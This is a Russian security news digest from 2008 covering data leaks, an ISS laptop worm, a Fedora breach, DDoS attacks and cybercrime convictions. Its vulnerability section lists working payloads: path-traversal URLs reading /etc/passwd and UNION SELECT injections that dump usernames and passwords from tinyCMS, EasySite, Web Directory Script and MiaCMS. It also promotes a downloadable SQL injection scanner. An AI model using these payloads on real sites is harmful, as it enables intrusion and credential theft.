ИТ-специалист из Оксфорда купил на аукционе eBay компьютер, содержавший конфиденциальные банковские записи более 1 млн. клиентов American Express, NatWest и Royal Bank of Scotland. Несмотря на то, что такая база данных стоит на черном рынке миллионы долларов, компьютер был продан по цене всего лишь в £35.

     Проданный компьютер принадлежал компании Mail Source, входящей в корпорацию Graphic Data, которая предлагает финансовым структурам услуги по обработке информации. По словам представителя Mail Source, в настоящее время проводится расследование, призванное определить истинную причину утечки. Вместе с тем, компания уже выяснила имя сотрудника, который выставил злополучный компьютер на аукцион.

     На компьютере хранились файлы со строго конфиденциальной информацией тысяч и тысяч людей. Профессиональная организация, которая обрабатывает такую информацию, должна принять все меры, чтобы перед продажей компьютеров она была надежным образом уничтожена.

     «Мне трудно представить, чем руководствовался сотрудник Mail Source, выставляя корпоративный компьютер на аукцион, - отметил директор по развитию бизнеса компании Perimetrix Алексей Доля. – Люди часто совершают необъяснимые действия, и службе безопасности приходится с этим считаться. Если бы она позаботилась о шифровании секретной информации заранее – то эта шокирующая утечка могла бы не произойти».

     В НАСА подтвердили ранее появившиеся в сети данные о том, что ноутбуки, привезенные американской стороной в июле этого года на МКС, оказались инфицированы интернет-червем. По уточнениям американского космического агентства, интернет-червь, который был подхвачен на космический ноутбук, именуется Gammima.AG и предназначен для кражи логинов и паролей для нескольких популярных сетевых игр.

     Сообщается, что вирус был обнаружен в августе 2007 когда ноутбуки астронавтов проверяли с земли. По словам пресс-службы НАСА, инцидент с инфицированием служебных компьютеров не является первым для космической отрасли и сейчас специалисты выясняют как интернет-червь был занесен на ноутбуки. Отдельно в НАСА дополнили, что инфицированные ноутбуки не имеют отношения к управляющим компьютерам космической станции. Ноутбуки, как правило, используются астронавтами для хранения каких-либо рабочих данных по выполнению научных заданий, а также для коммуникаций с землей, в частности для отправки электронной почты.

     По предварительной версии, во время одного из сеансов связи злонамеренный код мог быть занесен со входящими электронными письмами. Кроме того, не исключается и тот вариант, что вирус был занесен со съемного диска, которые астронавты также имеют при себе.

     Студентов шотландского университета Эбертей (University of Abertay) научат взламывать компьютеры. Курс компьютерного взлома станет одним из этапов подготовки специалистов по компьютерной безопасности.

     Аминистрация университета рассчитывает, что такой подход позволит готовить более высококлассных специалистов по компьютерной безопасности. Предполагается, что студент, побывавший в "шкуре хакера", будет лучше осведомлен об уязвимостях компьютерных систем, что позволит с большей вероятностью предотвратить их взлом.

     Представители университета подчеркивают, что компаниям не стоит опасаться студентов, прошедших данный курс. Каждый участник программы проходит строгий отбор и к обучению не допускаются люди, которые могут использовать полученные знания во вред.

     Команде криптологов удалось успешно произвести атаку на российский криптографический стандарт ГОСТ Р 34.11-94. Стандарт, который был введен 1 января 1995 года, определяет алгоритм и процедуру вычисления хэш-функции для последовательности символов. До этого момента, ГОСТ Р 34.11-94 считался одним из самых защищенных криптографических стандартов. Также криптологи продемонстрировали первую практическую инверсионную атаку на сокращенные варианты алгоритма SHA-1, которая может использоваться для вычитания пароля из хеша.

     Согласно отчету, криптологам удалось обнаружить неожиданную техническую уязвимость и использоваться ее для проведения коллизионной атаки в 2^23 раза быстрее, чем считалось возможным.

     Для сравнения, первая удачная коллизионная атака против алгоритма SHA-1 в 2005 году позволила ускорить процесс подбора до 2^11 – 2^69 вместо 2^80. Стоит заметить, что успех криптологов все же не угрожает ничем серьезным самому алгоритму хеширования. 256-битное значение хеша, генерируемого алгоритмом, все еще требует выполнения 2^105 операций для получения полной строки данных. За прошлые несколько лет, все атаки на алгоритмы хеширования, такие как SHA-1, и теперь, ГОСТ Р 34.11-94, являются коллизионными атаками. Все эти атаки относятся в основном к цифровым подписям приложений, когда атакующий имеет доступ к неподписанному документу.

     Даже если большинство современных атак являются чисто теоретическими, нам следуем помнить, что анализ криптографических функций хеширования еще недостаточно исследован, и будущими достижениями в этой области не стоит пренебрегать.

     Microsoft выпустила повторную версию обновления MS08-051 от 11 августа, которое должно было исправить три уязвимости в PowerPoint 2003. Согласно обновленному бюллетеню, первый вариант патча действительно исправлял то, что было обещано, но не включал другие важные обновления, связанные с безопасностью и надежностью.

     Eng:
     Anyone who updated PowerPoint in Office 2003 Service Pack 2 (SP2) or Office 2003 SP3 by grabbing the update from elsewhere -- in other words, directly from Microsoft's download site -- must reinstall the second edition of the patches, either by downloading the revised bits from Download Center or through Windows Update/Office Update.
     Microsoft gave a third option to users unable to immediately replace the flawed patches. "If you choose to not reinstall the update, you must manually set the registry key in order to block PowerPoint file types as a workaround," Microsoft advised.

Из уязвимостей в веб-приложениях последних дней можно выделить следующие:

1. tinyCMS 1.1.2 File Inclusion Vulnerability
Относительный путь к запрашиваемому файлу, завершающийся URL-encoded 0 (%00), передается через параметр config[template].Атакующий может запросить через параметр любой файл, указав относительный путь и завершив его URL-encoded 0. Условия эксплуатации: включенный register_globals и отключенная magic_quotes_gpc.
http://[host]/[tinyCMS]/modules/ZZ_Templater/templater.php?config[template]=../../../../etc/passwd%00
http://[host]/[tinyCMS]/modules/ZZ_Templater/templater.php?config[template]=../../../../[local_file]%00

2. EasySite v2.3 Multiple Remote Vulnerabilities
http://localhost/www/index.php?module=../../../
http://localhost/inc/vmenu.php?module=../../../

3. NoName Script 1.1 BETA Multiple Remote Vulnerabilities
http://localhost/index.php?action=newsadmindel&file_id=[SQL]

4. Web Directory Script <= 2.0 SQL Injection Vulnerability
Условие эксплуатации - magic_quotes_gpc = Off.
listing_view.php?name='+union+select+1,concat_ws(0x3a,username,
password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+members/*

5. MiaCMS <= 4.6.5 SQL Injection Vulnerability
index.php?option=com_content&task=view&id=-9999999+union+
select+1,concat_ws(0x3a,username,password)+from+mia_users/*&Itemid=9


     Координаторы проекта разработки открытой операционной системы Fedora сообщили о том, что на прошлой неделе хакеры получили несанкционированный доступ к нескольким серверам, используемым для цифровой подписи пакетов, входящих в состав операционной системы. В рассылке для пользователей Fedora говорится, что проникновение было обнаружено сравнительно быстро и тут же локализовано.

     Сообщается, что взлом был осуществлен в результате ранее неизвестной бреши в программном обеспечении OpenSSH, точнее в его RedHat-реализации. Пользователи других дистрибутивов, насколько сейчас известно, не подвержены данной проблеме. Инженеры-разработчики Red Hat и Fedora в минувшую пятницу выпустили срочное обновление для клиентской и серверной части OpenSSH, поэтому всем пользователям Fedora Linux и Red Hat Enterprise Linux 4 и 5 настоятельно рекомендовано обновить программное обеспечение, дабы не повторить судьбу Red Hat.

     По словам администраторов, насколько можно судить по результатам анализа серверных журналов, ломающие не получили доступа к системам отвечающим за генерацию ключей подписки пакетов, так как эти системы и их парольные фразы не хранились на пострадавших серверах.

     Твердотельные накопители быстро набирают популярность (особенно в сегменте ноутбуков), но эксперты предупреждают, что защита данных на SSD может стать проблемой.

     С одной стороны, SSD-накопители считаются более безопасными, чем традиционные жесткие диски, но, с другой, они уязвимы к физическим взломам, например, с помощью ультрафиолетового лазера, считают эксперты. Поэтому вопросы безопасности информации на SSD могут стать очень актуальными, когда такие накопители получат большее распространение и будут устанавливаться в различных видах мобильных устройств (к примеру, в смартфонах).

     Один из моментов, упоминаемых экспертами и связанных с безопасностью данных на SSD, касается NAND-памяти, на базе которой производятся твердотельные накопители. Джим Хэнди из исследовательской компании Objective Analysis отмечает, что хакеру ничто не помешает удалить флеш-память из накопителя и прочитать информацию с нее с помощью специального оборудования. После того, как информация будет прочитана, злоумышленник может получить файлы, используя доступное программное обеспечение для восстановления данных.

     Еще одна особенность SSD-накопителей - более простой механизм удаления данных. Если в случае традиционных жестких дисков необходимо либо перезаписать новую информацию на место старой, либо физически ее повредить, чтобы не было возможности ее прочитать, то в случае SSD информация при удалении, говоря условно, "смывается" ("Смывание" данных имеет определенные преимущества с точки зрения быстроты, но при неправильном и безответственном обращении данные могут быть потеряны безвозвратно).

     Компания Mozilla разработала технологию TraceMonkey, позволяющую в несколько раз увеличить скорость работы JavaScript и веб-приложений при использовании браузера Firefox.

     TraceMonkey уже включена в альфа-версию браузера Firefox 3.1. Однако по умолчанию технология TraceMonkey не доступна, так как еще не полностью отлажена и работает нестабильно. В будущем TraceMonkey станет частью бразуера Firefox, что позволит значительно ускорить его работу. В частности, в ряде тестов Firefox 3.1 с TraceMonkey работает с JavaScript почти в 40 раз быстрее, нежели Firefox 3.

     Также тесты показали, что TraceMonkey делает новый браузер Firefox более чем в два раза быстрее Apple Safari при работе с JavaScript. Ожидается, что TraceMonkey позволит значительно ускорить работу браузера со сложными специализированными веб-приложениями. В частности, было продемонстрировано, что TraceMonkey делает обработку изображений через веб-интерфейс более быстрой.

     8 августа 2008 г. сайт www.bdbd.ru подвергся DDos-атаке более чем с 10.000 IP-адресов. В результате этого сайт не работал c вечера 9 августа по утро 11 августа. После отбивания атаки она была возобновлена 15 августа более чем с 4.000 IP-адресов.

     Мы понимаем, что атаки специально планировались с вечера пятницы, чтобы вывести сайт из строя на выходные дни, и, как следствие, выбить его из результатов выдачи поисковых систем. Подобный тип атаки был впервые предпринят в апреле 2008-го, но тогда наша компания ничего не предприняла — мы посчитали, что каждый имеет право на ошибку и прощение. Но второй и третий раз — это уже не ошибка.

     Корпорация РБС объявляет вознаграждение в 250.000 (двести пятьдесят тысяч) рублей за информацию о том, кто явился заказчиком DDos-атаки 8 августа. Нам также потребуются доказательства подлинности этой информации, но не для суда, а лично для нас. Доказательства нам обязательно потребуются, потому как последствия для заказчика будут самые серьезные, и нам не хотелось бы выдвигать голословных обвинений.

     Мы предполагаем, что эту информацию нам может предоставить сам исполнитель DDos-атаки (юридическое лицо или физическое лицо, сотрудник компании). Мы понимаем, что для этой компании (или этого человека) это была всего лишь работа. В случае если это отдельный человек, мы гарантируем его физическую безопасность, а также, при его желании, и трудоустройство в технический отдел нашей компании — для реализации своего таланта на поприще созидания, а не разрушения. Мы не имеем никаких претензий к исполнителю, мы ищем лишь заказчика. Вся поступающая информация конфиденциальна. Контактное лицо со стороны Корпорации РБС - Евгений Васильев.

     Финская компания Nokia подтвердила наличие в системе Symbian Series 40 двух уязвимостей, позволяющей злоумышленнику удаленно установить и запустить на телефоне Java-приложение с полным доступом ко всем функциям устройства.

     Удалось ли Говдяку продать описание уязвимостей, неизвестно. Nokia заявила, что провела внутреннее расследование и выяснила, что обе уязвимости найдены в некоторых из ее продуктов. В компании подчеркнули, что не считают их опасными.

     В начале августа способ получения доступа ко всем функциям устройств на Symbian Series 40 выставил на продажу польский специалист по безопасности Адам Говдяк (Adam Gowdiak). Он запросил за копию своего многостраничного исследования 20 тысяч евро.

     Symbian Series 40 устанавливается в основном на бюджетные модели мобильников. Найденная уязвимость может затронуть свыше 100 миллионов сотовых телефонов.

     В форумных движках, как известно, очень много XSS уязвимостей. Некоторые из них не представляют особого вреда, одна есть многие, которые могут принести вред форуму.

     Недавно была найдена XSS в vBulletin 3.7.2 PL1 и 3.6.10 PL3. Имеет низкую опасность, эксплойта к ней нет. Позволяет удаленному пользователю произвести XSS-атаку. В комплекте с спамером по vBulletin может принести довольно большой вред.

     Уязвимость существует из-за недостаточной обработки входных данных в теме частного сообщения. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Для успешной эксплуатации уязвимости злоумышленник должен иметь действительные учетные данные и опция "Show New Private Message Notification Pop-Up" должна быть включена.

     По сообщению сразу нескольких антивирусных компаний, за новую веб-атаку, связанную с уязвимостями буфера обмена, ответственен flash-ролик со встроенным скриптом, реализованном на языке ActionScript.

     Напомним, что данная атака является универсальной и ей подвержены пользователи всех современных настольных операционных систем, имеющих графический интерфейс. Атака направлена на такую популярную функцию как "копировать/вставить" (copy/paste): при помощи веб-скритов злоумышленники "подселяют" в буфер обмена операционной системы ссылку или ссылки на злонамеренный сайт с размещенным хакерским ПО.

     В настоящий момент пользователи на форумах сайтов Apple, Digg, Newsweek и MSNBC активно обсуждают источники возникновения атаки. По последним сведениям, в сети появился ряд скрпитов, выполнение которых подселяет в буфер обмена ссылку на сайт, где хакеры предлагают загрузить лже-антивирус. Пользователи отмечают, что дополнительная опасность атаки заключается в том, что злонамеренная ссылка "намертво прописывается в буфере" и удалить ее можно лишь через полную перезагрузку системы, а это иногда невозможно.

Пока ни у экспертов по безопасности, ни у пользователей на форумах нет исходников скриптов, провоцирующих атаку, однако исследователь Авив Рафф из компании Raffon написал собственный концептуальный скрипт, в котором в буфер подселяется ссылка на сайт www.evil.com. Пробный образец скрипта расположен по адресу

     Платежная система Яндекс.Деньги будет использовать технологию Entrust IdentityGuard американской компании Entrust для надежной многофакторной аутентификации. Работа будет идти через партнера Entrust, Rainbow Technologies.

     В числе возможностей аутентификации, используемых платформой: имя пользователя и пароль, IP-геолокация, компьютер/устройство, вопросы и ответы, код доступа, вводимый однократно через интерфейс удаленного пользователя (получаемый в виде голосового сообщения, SMS или по электронной почте), карты-таблицы и маркеры с одноразовым кодом доступа. Entrust IdentityGuard также предоставляет несколько средств, поддерживающих двустороннюю аутентификацию, в том числе воспроизведение изображения и подписи к нему.

     Отмечается, что Entrust IdentityGuard уменьшает объем нагрузки на службы поддержки и обслуживание инфраструктуры. Платформа включает возможность полного администрирования через Интернет для управления пользователями и политикой, позволяя организациям с легкостью распределять административные задачи среди специалистов в зависимости от их роли.

     В рамках совместной операции подразделения по борьбе с высокотехнологичными преступлениями Голландии и ФБР США сегодня был арестован создатель бот-сети Shadow, состоящей из 100 000 компьютеров. Вместе с 19-летним молодым человеком, являющимся создателем сети, был задержан и покупатель программного обеспечения для управления сетью.

     Сообщается, что покупатель является гражданином Бразилии. Известно, что помощь в задержании преступников оказало и европейское подразделение "Лаборатории Касперского", кроме того, антивирусная компания предоставила утилиты для лечения компьютеров, зараженных трояном, превращавшем компьютер в участника бот-сети. Полиция Голландии связалась с местными пользователям, компьютеры которых были инфицированы и сообщила, что им необходимо загрузить с сайта ЛК бесплатную утилиту.

     SQL Helper 1.0 - приватный SQL Injection сканер. Этот сканер для поиска уязвимости sql-inj, случайно допущенных в ваших сайтах. Поиск осуществляется с помощи google, путем проверки через специальный запрос.
     По сути, это модифицированный и собранный в единую программу софт и материал по sql-inj запросам google. Для тех, кто пользуется Гугл для поиска уязвимостей, данная программа останется без необходимости.

Скачать SQL Helper 1.0

     24-летний Майкл Долан из американского штата Коннектикут получил 7 лет тюремного заключения за рассылку спама и создание мошеннических схем, ориентированных на пользователей интернет-портала AOL. Подобной деятельностью Долан занимался на протяжении 4 лет.

     В документах обвинения говорится, что Долан занимался массовой рассылкой поддельных писем многим тысячам пользователей, в части этих писем содержалось вредоносное программное обеспечение, созданное для кражи персональных данных пользователей. Кроме того, отмечается, что он был одним из участников преступной группы мошенников, состоявшей из пяти человек.

     В результате своей деятельности Долан и его подельники получили информацию о частных банковских счетах, адресах, номерах социального страхования и т.п. Мошенники орудовали в период с 2002 по 2006 год.

     Ленинский райсуд Екатеринбурга сегодня приговорил к 4 и 3 годам и 9 месяцам лишения свободы граждан Болгарии Гроздана Илиева и Цветана Божилова, похищавших номера и пин-коды банковских кредитных карт.

     «Илиев и Божилов в период с 9 по 12 мая 2007 года в Екатеринбурге с помощью специальной аппаратуры считывали с двух банкоматов в городе номера и пин-коды банковских кредитных карт. В тот момент, когда они снимали свою аппаратуру с банкоматов, их задержали сотрудники правоохранительных органов», - рассказали в пресс-службе. Если бы подсудимые смогли довести свой умысел до конца, то могли бы получить более 10 млн рублей, так как «сняли» информацию с более чем 1 тыс банковских карт.

     По оперативным данным, Илиев и Божилов входят в состав международной преступной группировки, которая действует в странах Евросоюза и занимается именно такими видами краж. Впоследствии данные о кредитных картах используются для изготовления их копий, а деньги обналичиваются в различных странах Европы.

     Злоумышленники, назвавшие себя Azerbaijan Defacers, взломали сайт генпрокуратуры Армении. Они внедрили на главную страницу код, перенаправляющий посетителей на страничку с нецензурными высказываниями в адрес Армении и России. Кроме того, на странице размещена надпись в поддержку азербайджанского дзюдоиста Эльнура Маммадли, завоевавшего на Олимпиаде золотую медаль, а также обещание освободить от армян азербайджанские территории.

     Вся информация на сайте генпрокуратуры осталась в неприкосновенности, внутренние страницы сайта также доступны и не перенаправляют пользователей на страницу хакеров. Аналогичные атаки были проведены хакерами на сайты армянских министерств. В частности, перенаправление на схожую по содержанию страницу Azerbaijan Defacers появилось на сервере министерства спорта и по делам молодежи, недоступен оказался сайт министерства юстиции, о сбое при доступе к базе данных предупреждает посетителей сайт министерства здравоохранения.

     К концу июля число писем, содержащих вирусы, вредоносные программы, а также ссылки на них, выросло по сравнению с обычным в несколько раз, говорится в блоге Google для корпоративных клиентов, где опубликован краткий анализ почтового трафика за прошедший месяц.

     Судя по представленному поисковиком графику, на протяжении 2008 года ежедневное число "вредных" писем, адресованных клиентам Google, редко превышало два миллиона. 24 июля этот показатель вырос до почти 10 миллионов писем. С этими письмами распространялась ссылка на отслеживание посылки, якобы отправленной через службу UPS. На поддельном сайте пользователям предлагалось скачать ПО, которое оказывалось вредоносной программой. Google отмечает, что многие рассылки теперь не прикладывают вредоносную программу к письму, а лишь дают на нее ссылку, маскируя ее, например, под новости о последних событиях.

     Тем не менее, "традиционные" методы заражения также используются. В частности, 5 августа было обнаружено большое число сообщений с зашифрованными RAR-аттачами. Данные Google основаны на информации серверов компании Postini, занимающейся хранением почты пользователей на своих серверах и обеспечением безопасности корпоративной почты. Google купил Postini в 2007 году.